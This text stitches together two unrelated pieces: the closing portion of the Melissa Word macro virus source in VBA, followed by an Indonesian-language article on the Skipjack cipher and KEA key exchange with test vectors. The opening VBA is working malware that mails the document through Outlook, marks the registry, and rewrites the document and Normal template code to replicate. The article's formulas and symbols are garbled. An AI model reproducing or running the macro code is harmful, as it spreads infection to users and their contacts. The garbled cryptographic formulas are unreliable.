BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
p$ = "clone"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
p$ = "clone"
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
'WORD/Melissa written by Kwyjibo
'Clone written by Duke/SMF
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."
End Sub
Encryption Skipjack pada Clipper Chip sebuah keamanan Yang paling rahasia Pada Pengiriman Data
A. Pengantar
1.Pendahuluan Skipjack.
Salah satu hal yang penting dalam komunikasi menggunakan komputer untuk menjamin kerahasiaan data adalah enkripsi. Enkripsi adalah sebuah proses yang melakukan perubahan sebuah kode yang biasa dimengerti menjadi sebuah kode yang tidak biasa dimengerti (tidak terbaca). Enkripsi dapat diartikan sebagai kode atau chipper. Sebuah chipper menggunakan suatu algoritma yang dapat mengkodekan semua aliran data (stream) bit dari sebuah pesan menjadi cryptogram yang tidak dimengerti (unintelligible). Karena teknik chipper merupakan suatu system yang telah siap untuk di automasi, maka teknik ini digunakan dalam system keamanan komputer dan network.
Skipjack sebagai salah satu chipper merupakan suatu encryption algoritma yang dikembangkan oleh National Security Agency Badan Keamanan Nasional Amerika Serikat ( NSA) untuk Clipper Chip. Tidak banyak diketahui algoritma Skipjack ini, karena itu algoritma Skipjack digolongkan rahasia oleh pemerintah Amerika Serikat.
Algoritma Skipjack diketahui suatu algoritma symmetric, yang menggunakan 80-bit kunci dan mempunyai 32 putaran untuk memproses setiap masing-masing encrypt atau decrypt operasi. Clipper-Chip adalah suatu chip komersil dibuat oleh NSA untuk encryption, dan menggunakan Algoritma Skipjack. AT&T mempunyai rencana untuk menggunakan Clipper Chip untuk encrypted jalur suara telpon.
2. Menjaminkah Skipjack?
Sejauh yang diketahui, NSA tengah menggunakan Skipjack ke encrypt messaging sistemnya, sehingga dirasakan algoritma itu aman. Skipjack menggunakan 80-bit kunci, yang berarti ada 2^80 ( kira-kira 10^24) atau lebih dari 1 kunci mungkin trilyun trilyun untuk digunakan!! Maknanya, diperkirakan lebih dari 400 milyar tahun tiap-tiap kunci algoritma untuk dapat dipecahkan!
Untuk memberi suatu perspektif lebih baik, jika kita mengasumsikan penggunaan 100,000 RISC komputer, masing-masing dengan kemampuan menjalankan motor sekitar 100,000 encryptions per detik, akan diperkirakan sekitar 4 juta tahun suatu kode dapat dipatahkan.
Pengembang Skipjack memperkirakan bahwa biaya daya proses untuk memecahkan algoritma skipjack dibagi dua untuk tiap-tiap delapan belas bulan, dan berdasarkan pada itu algoritma Skipjack akan membutuhkan sedikitnya 36 tahun baru dapat dipatahkan. Oleh karena itu, NSA percaya bahwa tidak ada resiko Skipjack dapat dirusakkan di dalam 30-40 tahun kedepan. Di samping itu, kekuatan Skipjack mampu melawan terhadap suatu serangan cryptanalytic. Untuk itu algoritma Skipjack harus mengarah kepada algoritma yang cryptographic dengan sepenuhnya ditetapkan dan digolongkan RAHASIA.
Algoritma yang crytographic mempunyai karakteristik seperti berikut:
2.Berfungsi serupa dengan DES ( yaitu., pada dasarnya suatu 64-bit kode membukukan perubahan bentuk yang dapat digunakan pada tempat yang sama dengan empat mode operasi ketika ditetapkan untuk DES di dalam FIPS 81);
3.Mampu memproses dengan 32 putaran encrypt/decrypt pada operasi tunggal;
Chip Clipper pada Algoritma skipjack berisi single-key 64-bit blok encryption algoritma. Algoritmanya menggunakan 80 kunci bit ( bandingkan dengan DES hanya 56 kunci bit) dan mempunyai 32 putaran yang berebut ( bandingkan dengan DES hanya 16 putaran), algoritma ini mendukung 4 mode operasi DES. Algoritma mengambil 32 thick clock, dan di dalam Codebook Elektronik ( ECB) mode berjalan pada 12 Mbits per detik.
Dengan penjelasan seperti diatas, Skipjack dapat dikatakan sangat dipercaya atau sangat menjamin.
3. Spesifikasi Algoritma Skipjack
Standard spesifikasi penggunaan algoritma SKIPJACK di implementasikan pada peralatan elektronik (seperti chip elektronik dengan skala besar) peralatan elektronik tersebut mengandung modul cryptograph yang di integrasikan pada product chip telekomunikasi.
Persetujuan implementasi telah di otorisasi Organizations for Integration into Security Equipment Peralatan tersebut harus di validasi oleh The National Institute of Standards and Technology (NIST) yaitu suatu Institut Teknologi Dan Standard Nasional Amerika Serikat dengan standard FIPS 140-1.
Spesifikasi algoritma SKIPJACK mempunyai ketentuan fungsi sebagai berikut
·Data Encryption: Session key harus menggunakan panjang key 80 bits untuk melakukan encryption plain text dengan menggunakan mode operasi salah satu dari yang dispesifikasikan pada FIPS-81: ECB, CBC, OFB(64), CFB (1, 8, 16, 32, 64).
·Data Encryption: Session key (80 bits) digunakan untuk encrypt data, juga digunakan sebagai decrypt hasil dari ciphertext.
Materi berikut ini menyediakan detail masalah Skipjack dan algoritma KEA. Algoritma ini mendukung single chip cryptoprocessors seperti CLIPPER (hanya Skipjack), CAPSTONE, KEYSTONE, REGENT, KRYPTON, dan FORTEZZA dan PC Card FORTEZZA Plus, dan juga produk lain yang masih famili FORTEZZA.
1.Algoritma
Materi ini mendiskusikan algoritma berikut:
·SKIPJACK Codebook encryptor/ Algoritma Decryptor
·KEA Algoritma Pertukaran Kunci
a.Mode operasi SKIPJACK.
b.SKIPJACK adalah sebuah utilizasi codebook 64 bit dari sebuah cryptovariable 80 bit. Mode operasi ini adalah bagian dari deskripsi FIPS-81 dari mode operasi untuk DES. Cakupannya meliputi:
Mode Output Feed-Back (OFB) 64 bit
Mode Cipher Feed-Back (CFB) 64 bit/32 bit/16 bit/8 bit
Codebook 64 bit
Cipher-Block Chaining (CBC) 64 bit
Spesifikasi SKIPJACK
Notasi dan Terminologi:
v” Set dari semua nilai n-bit
word: Sebuah element dari v16 ; bernilai 16-bit.
Byte: sebuah elemen dari v8 ; bernilai 8-bit.
Permutasi vn : Sebuah invertible(satu-ke-satu dan selanjutnya) fungsi dari Vn ke Vn. Nilai permutasi didalam vn, nilainya tidak dalam bits.
X ล Y Nilai exclusive –OR dari X dan Y
X || Y X serangkai dengan Y. Lihat X, Y merupakan bytes, kemudian X || Y = X x 28 + Y adalah sebuah word. Selanjutnya, X adalah high-order byte, dan Y adalah low-order byte.
Struktur Dasar: SKIPJACK encrypts 4-word (Contoh: 8-byte) data blok pengganti antara dua langkah aturan (A dan B) yang diperlihatkan seperti dibawah ini.
Langkah dari aturan A seperti berikut:
G permutasi W1,
w1 yang baru adalah xor dari keluaran G, sebuah counter, dan w4
words w2 dan w3 pindah satu register ke kanan; contoh menjadi w3, dan w4 berurutan.
w2 yang baru adalah keluaran G
Counter adalah hasil dari kenaikan
Aturan B cara kerjanya sama.
Langkah-langkah Persamaan Peraturan.
Persamaan dibawah ini, superscript dari langkah-langkah angka.
Melakukan encripsi: Masukan adalah wi0, 1ฃ i ฃ 4 (contoh k = 0 untuk langkah awal). Counter di 1. Langkah menurut aturan A dengan 8 langkah, kemudian berubah ke aturan B dan langkahnya lebih dari 8 langkah. Hasil dengan aturan A dengan 8 langkah, kemudian melengkapi encryption dengan 8 langkah dengan aturan B. Counter increment satu kali pada masing-masing langkah. Keluarannya adalah wi32 , 1ฃ i ฃ 4 .
Untuk mendecrypt: Masukan adalah wi32, 1ฃ i ฃ 4 , (contoh k=32 untuk memulai langkah). Mulai counter di langkah 32. Langkah menurut aturan B-1 untuk langkah ke delapan, kemudian berubah ke aturan A-1 dan langkah lebih dari 8 kali.
Hasil aturan B-1 untuk 8 langkah selanjutnya, kemudian dilengkapi decrypsinya dengan 8 langkah pada aturan A-1. Counter decrement satu kali setelah setiap langkah. Keluarannya adalah wi0, 1ฃ i ฃ 4 .
Permutasi - G.
Cryptovariable-dependent pemutasi G di v16 adalah empat putaran struktur Feistel. Fungsi putaran adalah mencampur tabel byte-substitusi (permutasi di v8), yang disebut dengan F-tabel. Masing-masing putaran dari G juga gabungan sebuah byte dari cryptovariable. Ada dua karakteristik dari fungsi seperti dibawah ini.
Dengan rekursif (system matematika): Gk (w = g1 || g2) = g5 || g6 dimana g1 = F(g I-1 ล cv4k + i-3) ล gi-2 adalah (4k + i – 3)thbyte didalam penjadwalan criptovariable. Lalu,
g3 = F (g2 ล cv4k) ล g1
g4 = F (g3 ล cv4k+1) ล g2
g5 = F (g4 ล cv4k+2) ล g3
g6 = F (g5 ล cv4k+3) ล g4
Biasanya untuk kebalikannya, [Gk]-1(w = g5|| g6 =g1 || g2 dimana gi-2 = F (gi-1 ล cv4k + I - 3) ล gi.
Skemanya:
Penjadwalan Cryptovariable.
Criptovariable panjangnya 10 bytes (labelnya dari 0 sampai 9) dan digunakan untuk pemakaian biasa. Lalu penjadwalan subscript diberikan dalam definisi permutasi-G yang diinterpretasikan mod-10.
F-Tabel:
F-tabel pada SKIPJACK diberikan pada notasi hexadesimal. Order index yang tertinggi 4 bit dari masukan baris dan order terendah index 4 bits pada kolom. Untuk contoh, F(7a) = d6
Spesifikasi KEA.
KEA adalah algoritma pertukaran kunci. Semua kalkulasi menggunakan modulus utama 1024-bit. Nilai modulus ini umumnya berhubungan dengan spesifikasi DSS. KEA dasarnya dengan utilizasi protokol Diffie-Helman yang mengurangi nilai akhir dengan sebuah kunci 80 bit.
Operasi KEA menggunakan panjang eksponen 160 bits. Penggunaan eksponen pada KEA oleh pemakai mengunakan komponen spesifik yang rahasia. KEA menyediakan pengamanan setaraf dengan yang disediakan oleh SKIPJACK. Order operasinya 280.
KEA mengharuskan pemakai memvalidasi penerimaan nilai public dari yang lain, tetapi tidak spesifik dalam melakukannya. Alat ini musti menyediakan order data seperti dibawah ini untuk implementasi algoritma pertukaran kunci (KEA).
p modulus utamanya1024-bit yang menetapkan field dimana p = p1023 p1022 ……p0.
q 160 bit pembagi utama dari p – 1 untuk mengecek komponen public q = q159 q158 …….. q0
g 1024-bit dasar untuk eksponensiasi. Sebuah elemen order q didalam group perkalian dari mod p.
g = g1023 g1022 ……g0
x 160-bit angka rahasia yang dipilih oleh pemakai (0
x = x159 x158 …x0
Y 1024-bit nilai corresponden public dan nilai private x
Y = gx mod p = Y1023 Y1022 ……… Y0
Pad 80-bit nilai pengisi
pad = pad79 pad78 …… pad0
= 72f1a87e92824198abOb hex
r 160-bit angka random
r = r159 r158
Sebuah sinyal syarat untuk penentuan dari inisiator dan penerimaan dari sebuah perubahan tidak begitu penting. Sebuah gambaran dari proses berikut. Untuk dua pemakai A dan B, subscript A dan B digunakan untuk penanda “owner” dari nilai yang seharusnya.
Pertukaran A dan B atau isi dari sebuah direktori sertifikat dari terminal terjauh. Dari sertifikat, nilai public Y dari terminal lain dapat berisi sepanjang identifikasi pemakai tergabung dan ada informasi lain.
Masing-masing validasi alat kunci public Y ditentukan dan termasuk kunci public yang valid didalam jaringan. Jika validasi sah, proses terhenti. Jika terjadi validasi cek silahkan lakukan langkah c.
Masing-masing alat pertukaran merupakan komponen random. Alat A umumnya 160-bit dari angka random private rA dan pengiriman versi angka public seperti berikut:
RA = grA mod p
Alat B umumnya 160-bit rB dan mengirimkan
RB= grA mod p
Masing-masing komponen random public panjangnya 1024-bit
Setelah menerima komponen random public dan terakhir kunci public, masing-masing alat mengecek verifikasi kedua penerimaan nilai order q.
Alat A akan menghitung dan memverifikasi:
1 < RB, YB < p
(RB)q บ 1 mod p dan (YB)q บ 1 mod p
Alat B akan menghitung dan memverifikasi:
1 < RA, YA < p
(RA)q บ 1 mod p dan (YA)q บ 1 mod p
Jika verifikasi dicek, lanjutkan langkah e. Bila ada verifikasi yang pasti, stop.
Alat A akan memegang YB dan menghitung nilai tAB. Alat akan menghitung ekuivalen nilai tBAyang digunakan menerima komponen random.
tAB = (YB)rA mod p = g x B rA mod p
tBA = (RA)xB mod p = g rA x B mod p = g x B rA mod p
f. Masing-masing alat penghitung u dengan cara yang sama harus menghitung t.
uBA = (YA) rB mod p = g xA rB mod p
uAB = (RA) rB mod p = g rB xA mod p = g xA rB mod p
Masing-masing alat menghitung w untuk meyakinkan pengecekan:
w =(t + u) mod p น 0
Jika pase pengecekan selesai, lanjutkan langkah h, kalau tidak stop.
Hasil ini dibagi dalam dua seksi:
v1 = ( w ) mod 280 v2 = ( w ) mod 280
2 (1024-80) 2 (1024-160)
Contoh, jika angka bit didalam w adalah w1023, …….w0 dari MSB ke LSB, kemudian v1= w1023 …..w944 dan v2= w943 ….w864
Kuncinya adalah:
Key = 216(Ev1ล pad (Ev1 ล pad [v2 mod 2 64])]
216
ล [(Ev1ล pad [ v2 mod 2 64]) ล (v2 mod 2 16
216
248
Catatan bahwa fungsi ini mewakili encrypsi dari v2 dengan v1 dengan isi XOR.
Sebuah ringkasan pertukaran KEA diantara alat A dan B seperti dibawah ini:
Alat A: Alat B:
p,q,g keadaan kedua alat p,q,g
xA kunci private masing-masing alat xB
YA Y = gx mod p YB
YB YA
Isi alat public yang lain melalui
Sertifikat atau kiriman dalam msg
rA A dan B umumnya angka random rB
RA R = gr mod p RB
RB RA
Pertukaran angka random public
Check semua nilai yang diterima
tAB= (YB) rA mod p hitung t = g rAxB mod ptBA= (RA) xB mod p
uAB= (RB) xA mod p hitung u = g xArB mod puBA= (YA) rB mod p
w = (tAB + uAB) mod p hitung w dan check wน0 w = (tBA + uBA) mod p
v1, v2 kutipan v1 dan v2 dari wv1, v2
Key form kunci dari v1, v2, blok Key
Aplikasi E-Mail dari KEA
Untuk aplikasi E-Mail dimana penerima tidak berperan didalam formasi kunci, kontribusi penerima ke pertukaran random ditempatkan dengan kunci publik dari penerima. Berikut, A sedang mengirim dan B sedang menerima pesan E-Mail. Pertama sekali mulai dengan formasi dari pesan E-Mail.
1. Mengirim E-Mail.
Alat A isi dari sebuah direktori atau sebuah cache local sertifikat dari sebuah terminal yang jauh. Dari sertifikat, nilai public YB dari terminal B dapat berisi sepanjang identifikasi pemakai tergabung dan ada informasi lainnya.
Alat B validasi kunci publik YB yang ditentukan didalam kunci publik yang pemakainya sudah valid di jaringan. Jika validasi ada yang pasti, lanjutkan ke langkah c.
Alat A kemudian diverifikasi:
1 < YB < p dan (YB )q บ 1 mod p
Jika mengecheck verifikasi, lanjutkan ke langkah d. Bila ada verifikasi yang pasti, berhenti.
Alat A umumnya angka random rA dan hitungan RA yang ditempatkan didalam paket pesan yang dikirim ke terminal yang jauh.
RA = grA mod p
Komponen random ini panjangnya 1024 bit.
Alat A kemudian menerima YB dan hitung nilai tAB.
tAB = (YB) rA mod p = g rAxB mod p = g xAxB mod p
Alat A menghitung:
uAB = (YB)xA mod p = gxBxAmod p = g xAxB mod p
Alat A kemudian menghitung w dan meyakinkan pengecekan :
w = (tAB + uAB) mod p น 0
Jika pengecdsxekannya sah, lanjutkan langkah h. jika tidak berhenti.
Hasil ini dipotong dalam dua seksi;
v1 = ( w ) mod 280
v2 = ( w ) mod 280
2 (1024 - 80) 2(1024 - 160)
contoh, jika angka bits didalam w seperti w1023 …….w0 dari MSB ke LSB, kemudian v1 = w1023 ….w944 dan v2 = w943 ……w864
Kunci
Kunci = 216 [Ev1 ล pad(Ev1 ล pad[v2 mod 264])]
216
ล [((Ev1 ล pad[v2 mod 264])]
216 ล ( v2 mod 216)]
248
Catatan bahwa fungsi ini mewakili enkripsi dari v2 dengan v1 XOR yang diblok.
2. Menerima E-Mail
Alat B berisi sertifikat dari terminal jauh, A, menerima pesan E-Mail. Dari sertifikat, nilai public YA dari terminal A yang dapat berisi sepanjang pemakai teridentifikasi dalam gabungan dan ada informasi yang lain.
Alat B memvalidasi kunci publik dari YA ditentukan masuk didalam kunci publik dari pemakai yang valid didalam jaringan. Jika validasi pasti/sah, proses dihentikan. Jika masih terjadi pengecekan, lanjutkan langkah c.
Alat B menerima komponen random yang dihasilkan dari A.
RA = grA mod p
Komponen random panjangnya 1024 bit.
Alat B akan menghitung dan memverifikasi:
1 < RA, YA < p
(RA)q บ 1 mod p dan (YA)q บ 1 mod q
Jika verifikasi dicek, lanjutkan langkah e.
Alat B akan diberikan RA dan menghitung nilai tBA
tBA = (RA)xB mod p = grAxB mod p
Alat B menghitung:
uBA = (YA)xB mod p = gxAxB mod p
Alat B menghitung w dan cek untuk meyakinkan bahwa:
w = (tBA + uBA) mod p น 0
jika ini untuk mengecek nilai, lanjutkan pada langkah h. Jika tidak stop.
Untuk mencari hasil dibagi dalam dua seksi
v1 = ( w ) mod 280 v2 = ( w ) mod 280
2 (1024-80) 2 (1024-160)
Contoh, jika angka bit didalam w adalah w1023, …….w0 dari MSB ke LSB, kemudian v1= w1023 …..w944 dan v2= w943 ….w864
Kunci:
Kunci = 216 [Ev1 ล pad(Ev1 ล pad[v2 mod 264])]
216
ล [((Ev1 ล pad[v2 mod 264])]
216 ล ( v2 mod 216)]
248
Catatan bahwa fungsi ini mewakili enkripsi dari v2 dengan v1 XOR yang diblok.
B. ANNEX – Tes Vector
Semua nilai adalah heksadesimal. Data ini tidak termasuk atau ditentukan oleh banyak antar muka biasa. Informasi biasanya dengan Most Significant Bit/Byte/Word ke sebelah kiri. X menggambarkan “don’t care”.
SKIPJACK – MODE CODEBOOK
Plaintext input : 33221100ddccbbaa
Cryptovariable: 00998877665544332211
Langkah lanjutan:
w1 w2 w3 w4
0 33221100 ddccbbaa
1 b0040baf 1100ddcc
2 e6883b46 0baf1100
3 3c762d75 3b460baf
4 4c4547ee 2d753b46
5 b949820a 47ee2d75
6 f0e3dd90 820a47ee
7 f9b9be50 dd90820a
8 d79b5599 be50dd90
9 dd901e0b 820bbe50
10 be504c52 c391820b
11 820b7f51 f209c391
12 c391f9c2 fd56f209
13 f20925ff 3a5efd56
14 fd5665da d7f83a5e
15 3a5e69d9 9883d7f8
16 d7f88990 53979883
17 9c000492 89905397
18 9fdccc59 04928990
19 3731beb2 cc590492
20 7afb7e78 beb2cc59
21 7759bb15 7e7dbeb2
22 fb6445c0 bb157e7d
23 6f7f1115 45c0bb15
24 65a7deaa 111545c0
25 45c0e0f9 bb141115
26 11153913 a523bb14
27 bb148ee6 281da523
28 a523bfe2 35ee281d
29 281d0d84 1adc35ee
30 35eee6f1 25871adc
31 1adc60ee d3002587
32 2587cae2 7a12d300
Keluaran Ciphertext : 2587cae27a12d300
Algoritma pertukaran kunci (KEA)
p = 9d4c6e6d 42ea91c8 28d67d49 94a9f01b 8e5b5b73 0d0faae7 bd569dd1
Kunci untuk pemakai B = 97fd1c6b d86bc439 115bxxxx
C. Kesimpulan.
Cryptography telah berkembang sejak lama, ketika orang menginginkan informasi yang ia kirimkan tidak dapat “dibaca” oleh pihak tak berkepentingan. Cryptography secara tradisional dikenal dengan dua mekanisme, yaitu kunci privat dan kunci publik. Sesuai dengan materi yang penulis buat maka enkripsi Skipjack termasuk dalam kunci privat berupa DES (data encryption standard). Enkripsi secara konvensional tergantung pada beberapa factor:
Algoritma enkripsi harus cukup kuat sehingga menjadikan sangat sulit untuk mendekripsikan chipper teks yang diterima dengan chipper teks tersebut terutama oleh orang yang tidak berkepentingan dengan pesan kita.
Keamanan dari algoritma enkripsi bergantung pada kerahasiaan dari kuncinya bukan algoritmanya.
Mengingat enkripsi dengan Skipjack secara matematis sangat terjamin, untuk itu dalam bekerja dengan enkripsi ini diperlukan kesepakatan bagi pemegangnya agar aman harus:
Kunci harus dirahasiakan.
Adalah tidak mungkin atau sangat tidak praktis untuk menterjemahkan informasi yang telah dienkripsi.
Pengetahuan tentang algoritma dan sample dari kata yang terenkripsi tidak mencukupi untuk menentukan kunci.
Dengan demikian apabila kita ingin menekuni bidang enkripsi ini, diperlukan pengetahuan khusus agar kita dapat mengelola dengan baik enkripsi chipper text dari pesan-pesan yang memang perlu dirahasiakan.